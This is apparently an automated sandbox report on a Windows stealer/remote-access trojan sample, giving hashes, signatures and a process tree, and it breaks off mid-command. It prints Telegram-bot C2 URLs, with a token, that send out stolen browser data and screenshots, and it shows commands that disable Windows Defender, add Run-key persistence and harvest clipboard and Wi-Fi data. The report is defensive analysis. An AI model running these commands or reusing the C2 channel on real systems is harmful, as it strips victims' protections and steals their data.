Resubmissions

04-09-2024 01:46

240904-b6968atgqa 10

04-09-2024 01:44

240904-b6b97asfqq 10

28-08-2024 08:00

240828-jwb6fascqn 10

Analysis

  • max time kernel
    24s
  • max time network
    68s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    04-09-2024 01:46

General

  • Target

    06d1a9fd3099cfb0cc829db930ab25f75a532e5e670e1704844cf7b1000d6314.exe

  • Size

    27.8MB

  • MD5

    7ea99740a913fd01ab5b6d630a65f501

  • SHA1

    fe11a17c1a403d6df28508d576c76ece07cce88b

  • SHA256

    06d1a9fd3099cfb0cc829db930ab25f75a532e5e670e1704844cf7b1000d6314

  • SHA512

    29f0f688d920bccc887f70710c3b6b01dd004dbef0c294bc57a46d7c460dc979ddb08a8d3c21df26510cbe3c380dc17dcc43e4fa86dc9d56dd4ff17de2280953

  • SSDEEP

    393216:CUrTbCVFENlgdkQbaVxN2dAdpN7D9aJtW9dcGMBD2KSedViDKKeLQOshouIkPFt4:CUvRgdjtAd99dfGV6qLxwouZtRL

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0%20kb

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%B8Screenshot%20take

Signatures

  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • MilleniumRat

    MilleniumRat is a remote access trojan written in C#.

  • Modifies WinLogon for persistence 2 TTPs 5 IoCs
  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Stops running service(s) 4 TTPs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 14 IoCs
  • Loads dropped DLL 22 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 52 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 11 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Drops file in System32 directory 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 5 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies registry class 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 17 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:640
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:432
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:692
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:988
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:564
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:684
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:984
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  1⤵
                    PID:1076
                    • C:\Program Files\Google\Chrome\updater.exe
                      "C:\Program Files\Google\Chrome\updater.exe"
                      2⤵
                      • Executes dropped EXE
                      PID:236
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                    1⤵
                      PID:1116
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1132
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                        1⤵
                          PID:1232
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                          1⤵
                            PID:1264
                            • C:\Windows\system32\sihost.exe
                              sihost.exe
                              2⤵
                                PID:2280
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                              1⤵
                                PID:1324
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                1⤵
                                  PID:1400
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                  1⤵
                                    PID:1448
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                    1⤵
                                      PID:1568
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                      1⤵
                                        PID:1576
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k NetworkService -p
                                        1⤵
                                          PID:1680
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                          1⤵
                                            PID:1692
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1748
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                              1⤵
                                                PID:1868
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1876
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1948
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1964
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:2032
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:1304
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2100
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2264
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2420
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2460
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2472
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p
                                                                    1⤵
                                                                      PID:2520
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                        PID:2608
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2636
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                          1⤵
                                                                            PID:2668
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                            1⤵
                                                                              PID:2708
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                              1⤵
                                                                                PID:2720
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                1⤵
                                                                                  PID:2360
                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                  1⤵
                                                                                    PID:804
                                                                                  • C:\Windows\Explorer.EXE
                                                                                    C:\Windows\Explorer.EXE
                                                                                    1⤵
                                                                                      PID:3320
                                                                                      • C:\Users\Admin\AppData\Local\Temp\06d1a9fd3099cfb0cc829db930ab25f75a532e5e670e1704844cf7b1000d6314.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\06d1a9fd3099cfb0cc829db930ab25f75a532e5e670e1704844cf7b1000d6314.exe"
                                                                                        2⤵
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:4960
                                                                                        • C:\Users\Admin\AppData\Local\Temp\06d1a9fd3099cfb0cc829db930ab25f75a532e5e670e1704844cf7b1000d6314.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\06d1a9fd3099cfb0cc829db930ab25f75a532e5e670e1704844cf7b1000d6314.exe"
                                                                                          3⤵
                                                                                          • Loads dropped DLL
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2908
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI49602\Build.exe -pbeznogym
                                                                                            4⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:2768
                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI49602\Build.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\_MEI49602\Build.exe -pbeznogym
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:1628
                                                                                              • C:\ProgramData\Microsoft\hacn.exe
                                                                                                "C:\ProgramData\Microsoft\hacn.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:5720
                                                                                                • C:\ProgramData\Microsoft\hacn.exe
                                                                                                  "C:\ProgramData\Microsoft\hacn.exe"
                                                                                                  7⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:1484
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI57202\s.exe -pbeznogym
                                                                                                    8⤵
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:1616
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI57202\s.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\_MEI57202\s.exe -pbeznogym
                                                                                                      9⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:2532
                                                                                                      • C:\ProgramData\svchost.exe
                                                                                                        "C:\ProgramData\svchost.exe"
                                                                                                        10⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:4912
                                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
                                                                                                          11⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:6084
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
                                                                                                            12⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:2896
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
                                                                                                              13⤵
                                                                                                              • Modifies WinLogon for persistence
                                                                                                              • Executes dropped EXE
                                                                                                              • Adds Run key to start application
                                                                                                              • Drops file in Program Files directory
                                                                                                              • Drops file in Windows directory
                                                                                                              • Modifies registry class
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:4152
                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\az4ymlqy\az4ymlqy.cmdline"
                                                                                                                14⤵
                                                                                                                • Drops file in System32 directory
                                                                                                                PID:2092
                                                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAF5A.tmp" "c:\Windows\System32\CSCE28CC0ECC54746CD99DA385FD3522EA.TMP"
                                                                                                                  15⤵
                                                                                                                    PID:5192
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\JDB0jhEdEj.bat"
                                                                                                                  14⤵
                                                                                                                    PID:4384
                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      15⤵
                                                                                                                        PID:4288
                                                                                                                      • C:\Windows\system32\chcp.com
                                                                                                                        chcp 65001
                                                                                                                        15⤵
                                                                                                                          PID:5444
                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                          ping -n 10 localhost
                                                                                                                          15⤵
                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                          • Runs ping.exe
                                                                                                                          PID:1548
                                                                                                                        • C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\lsass.exe
                                                                                                                          "C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\lsass.exe"
                                                                                                                          15⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:3756
                                                                                                              • C:\ProgramData\main.exe
                                                                                                                "C:\ProgramData\main.exe"
                                                                                                                10⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:5612
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpB314.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpB314.tmp.bat
                                                                                                                  11⤵
                                                                                                                    PID:3156
                                                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                                                      Tasklist /fi "PID eq 5612"
                                                                                                                      12⤵
                                                                                                                      • Enumerates processes with tasklist
                                                                                                                      PID:2188
                                                                                                                    • C:\Windows\system32\find.exe
                                                                                                                      find ":"
                                                                                                                      12⤵
                                                                                                                        PID:1652
                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                        Timeout /T 1 /Nobreak
                                                                                                                        12⤵
                                                                                                                        • Delays execution with timeout.exe
                                                                                                                        PID:5800
                                                                                                                      • C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
                                                                                                                        12⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Checks processor information in registry
                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                        PID:4936
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
                                                                                                                          13⤵
                                                                                                                            PID:1360
                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
                                                                                                                              14⤵
                                                                                                                              • Adds Run key to start application
                                                                                                                              • Modifies registry key
                                                                                                                              PID:5560
                                                                                                                    • C:\ProgramData\setup.exe
                                                                                                                      "C:\ProgramData\setup.exe"
                                                                                                                      10⤵
                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      • Drops file in Program Files directory
                                                                                                                      PID:6128
                                                                                                            • C:\ProgramData\Microsoft\based.exe
                                                                                                              "C:\ProgramData\Microsoft\based.exe"
                                                                                                              6⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:1856
                                                                                                              • C:\ProgramData\Microsoft\based.exe
                                                                                                                "C:\ProgramData\Microsoft\based.exe"
                                                                                                                7⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:3300
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                                                                                                  8⤵
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:4528
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                                                                                                    9⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5584
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                  8⤵
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:5008
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                    9⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:4124
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                  8⤵
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:5184
                                                                                                                  • C:\Windows\system32\tasklist.exe
                                                                                                                    tasklist /FO LIST
                                                                                                                    9⤵
                                                                                                                    • Enumerates processes with tasklist
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:1828
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                  8⤵
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:1244
                                                                                                                  • C:\Windows\system32\tasklist.exe
                                                                                                                    tasklist /FO LIST
                                                                                                                    9⤵
                                                                                                                    • Enumerates processes with tasklist
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:4868
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                  8⤵
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:5664
                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                    9⤵
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:3076
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                  8⤵
                                                                                                                  • Clipboard Data
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:1524
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell Get-Clipboard
                                                                                                                    9⤵
                                                                                                                    • Clipboard Data
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:3964
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                  8⤵
                                                                                                                    PID:5436
                                                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                                                      tasklist /FO LIST
                                                                                                                      9⤵
                                                                                                                      • Enumerates processes with tasklist
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:2124
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                    8⤵
                                                                                                                      PID:4308
                                                                                                                      • C:\Windows\system32\tree.com
                                                                                                                        tree /A /F
                                                                                                                        9⤵
                                                                                                                          PID:3280
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                        8⤵
                                                                                                                        • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                        PID:2716
                                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                                          netsh wlan show profile
                                                                                                                          9⤵
                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                          • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                          PID:5888
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                        8⤵
                                                                                                                          PID:4864
                                                                                                                          • C:\Windows\system32\systeminfo.exe
                                                                                                                            systeminfo
                                                                                                                            9⤵
                                                                                                                            • Gathers system information
                                                                                                                            PID:6028
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 